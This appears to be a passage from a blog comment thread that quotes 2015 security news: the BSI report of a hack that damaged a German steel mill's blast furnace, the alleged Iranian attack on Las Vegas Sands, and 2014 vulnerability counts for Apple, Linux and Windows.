    A Cyberattack Has Caused Confirmed Physical Damage for the Second Time Ever
    http://www.wired.com/2015/01/german-steel-mill-hack-destruction/

    Amid all the noise the Sony hack generated over the holidays, a far more troubling cyber attack was largely lost in the chaos. Unless you follow security news closely, you likely missed it.

    I’m referring to the revelation, in a German report released just before Christmas (.pdf), that hackers had struck an unnamed steel mill in Germany. They did so by manipulating and disrupting control systems to such a degree that a blast furnace could not be properly shut down, resulting in “massive”—though unspecified—damage.

    This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment. The first case, of course, was Stuxnet

    It’s not clear when the attack in Germany took place. The report, issued by Germany’s Federal Office for Information Security (or BSI), indicates the attackers gained access to the steel mill through the plant’s business network, then successively worked their way into production networks to access systems controlling plant equipment. The attackers infiltrated the corporate network using a spear-phishing attack

    Once the attackers got a foothold on one system, they were able to explore the company’s networks, eventually compromising a “multitude” of systems, including industrial components on the production network.

    “Failures accumulated in individual control components or entire systems,” the report notes. As a result, the plant was “unable to shut down a blast furnace in a regulated manner” which resulted in “massive damage to the system.”

    “The know-how of the attacker was very pronounced not only in conventional IT security but extended to detailed knowledge of applied industrial controls and production processes,” the report says.

    The report doesn’t name the plant or indicate when the breach first occurred or how long the hackers were in the network before the destruction occurred.

    The report also illustrates the need for strict separation between business and production networks to keep hackers from leaping from one network to another and remotely accessing critical systems over the internet. Although a network can only be considered truly air-gapped if it’s not connected to the internet and is not connected to other systems that are connected to the internet, many companies believe that a software firewall separating the business and production network is sufficient to stop hackers from making that leap. But experts warn that a software firewall can be misconfigured or contain security holes that allow hackers to break through or bypass them nonetheless.

  22. Tomi Engdahl says:

    Iran hacks America where it hurts: Las Vegas casinos
    Digital Pearl Harbour debunked by US director of national intelligence
    http://www.theregister.co.uk/2015/02/27/iran_behind_us_casino_hack/

    US director of National Intelligence James Clapper has accused Iran of orchestrating a 2014 hack of the Las Vegas Sands casino. The attack crippled the magnificent cultural institution’s IT infrastructure.

    Clapper told a US Senate Armed Services Committee Thursday (US time) that the hack of the US$14 billion casino was the handiwork of Iran rather than ordinary hacking groups, Bloomberg reports.

    “While both of these nations (Iran and North Korea) have lesser technical capabilities in comparison to Russia and China, these destructive attacks demonstrate that Iran and North Korea are motivated and unpredictable cyber-actors,” Clapper says.

    The attacks brought down the casino’s IT systems including email but not the most valuable components of the organisation.

    The gambling giant said at the time that punters’ credit card details were safe.

    Las Vegas Sands appears to have been targeted due to the casino chief executive officer Sheldon Adelson’s public support of Israel, according to Bloomberg.

    The alleged Iranian hackers commandeered the website emblazoning it with a shoddy slapdash image of the Casino’s US sites in flames

    DON’T PANIC! No credit card details lost after hackers crack world’s largest casino group
    Las Vegas Sands email and website still down after hackers trash CEO Sheldon Adelson
    http://www.theregister.co.uk/2014/02/13/dont_panic_no_credit_card_details_lost_after_hackers_crack_worlds_largest_casino_group/

  23. Tomi Engdahl says:

    And the buggiest OS provider award goes to … APPLE?
    Count of 2014’s flaws finds more nasties in Mac OS and iOS than in Windows or Linux
    http://www.theregister.co.uk/2015/02/26/windows_beats_apple_linux_with_fewest_bugs_for_2014/

    Apple’s operating systems and Linux racked up more vulnerability reports than Windows during 2014, according to research from security outfit GFI.

    Cupertino’s OS X and iOS platforms topped the 2014 bug charts with 147 and 127 holes disclosed in each, nudging out the Linux Kernel with 119 flagged flaws, the National Vulnerability Database statistics show.

    Apple also has the most high-risk holes with 64 reported in OS X, and is just nudged out by Linux in the medium-severity stakes which clocked 74 flaws to iOS’ 72.

    Windows platforms were far behind with 68 total reported bugs and 20 medium-severity flaws reported. Surveyed Windows releases included Windows 8, 8.1, 7, Vista, and RT, along with Server 2012 and 2008. All had between 30 and 38 vulnerabilities.

    Crucially, up to 80 percent of the reported bugs concerned third party applications, and only 13 percent related to the operating systems in question.
